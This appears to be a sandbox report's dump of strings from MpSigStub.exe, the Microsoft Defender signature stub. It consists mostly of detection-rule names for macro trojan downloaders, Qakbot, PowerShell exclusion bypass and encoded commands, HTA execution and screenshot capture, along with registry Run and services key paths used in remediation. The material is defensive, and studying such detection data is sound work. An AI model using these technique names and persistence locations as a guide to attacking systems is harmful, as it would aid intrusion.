Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (]!#aggr:newpeoriginalnamedifffromfilename
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:macro:o97m/macrocreatthread.a!amsi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (]!#lua:macro:o97m/macrocreatthread.a!amsi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:powershell:general.checklist.s1001
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: )\!#aggr:powershell:general.checklist.s1001
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojandownloader:o97m/encdoc.tda!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: *[!#alf:trojandownloader:o97m/encdoc.tda!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojandownloader:o97m/encdoc.got!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: *[!#tel:trojandownloader:o97m/encdoc.got!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojandownloader:o97m/qakbot.smtt!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +z!#tel:trojandownloader:o97m/qakbot.smtt!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojandownloader:powershell/mpexclusionbypass
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 3r!#alf:trojandownloader:powershell/mpexclusionbypass
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:htaexecfromdwn.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: p!#alf:htaexecfromdwn.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:capturescreenshot.rm
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: l!#alf:capturescreenshot.rm
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#//aggr:horsewdocstrings.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: k!#//aggr:horsewdocstrings.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:win32/suspxl4exec.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: i!#slf:win32/suspxl4exec.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:scpt:trojan:html/phish.al
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g!#alf:scpt:trojan:html/phish.al
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:powershell/encodedcommand
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#aggr:powershell/encodedcommand
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_makecab.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_makecab.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_regedit.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_regedit.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_regjump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_regjump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_regsvcs.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_regsvcs.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_replace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_replace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_rpcping.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_rpcping.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_runonce.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_runonce.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_sdelete.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_sdelete.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_streams.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_streams.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_svchost.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_svchost.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_taskmgr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_taskmgr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_tcpvcon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_tcpvcon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_tcpview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_tcpview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_tracker.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_tracker.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_usbinst.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_usbinst.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_winword.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_winword.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_wscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_wscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_xwizard.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_xwizard.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_makecab.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_makecab.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_mftrace.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_msiexec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_nlnotes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_nvudisp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_nvuhda6.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamedoname_procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hstr:virtool:win32/obfuscator.pn!k3.0_%02x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +hstr:virtool:win32/obfuscator.pn!k3.0_%02x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 69d781ff29e39
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: systempathtodosname
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getsystemdriverpath
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readfilepointer16
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readfilepointer32
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readpointer16
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readpointer32
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: readpointer64
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getlowestdevice32
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getlowestdevice64
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: multibytetochar
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \device
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ntsecuresys
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ^%x%x%x%x%x%x%x%x%x%x%x%x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hsubkey
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: syshost.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \systemroot\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: kernel
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: getmemoryasstring
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: bladabindi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: removerunningmalicious
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: removestartupmalicious
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhkcuregrun
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhklmregrun
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhkcudi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enumhkcusoft
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: curunkeyobj
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: curookkeyobj
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkcu\software\microsoft\windows\currentversion\explorer\shell folders
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: fhkcu\software\microsoft\windows\currentversion\explorer\shell folders
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: malwarenameb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ^%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: c^%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: maliciousvaluedata
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .exe" ..
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .exe" ..
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\software\microsoft\windows\currentversion\run\\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 5hklm\software\microsoft\windows\currentversion\run\\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: blavaluedata
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cudivalue
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkcu\\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cusoftkeynameobj
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cusoftnames
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cusubkeynames
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkcu\software\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: subsoftkey
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: soctuseer
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: soctuseerincludesgenericrepairhelpers
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: browsermodifier:win32/soctuseer
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: browsermodifier:win32/soctuseer
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: system32\drivers
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.sys
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.sys
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\software\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 9hklm\software\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\software\wow6432node\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ehklm\software\wow6432node\microsoft\windows\currentversion\uninstall
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %ef@
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hklm\system\currentcontrolset\services
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 'hklm\system\currentcontrolset\services
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enhances experience when browsing the web.
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +enhances experience when browsing the web.
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.exe
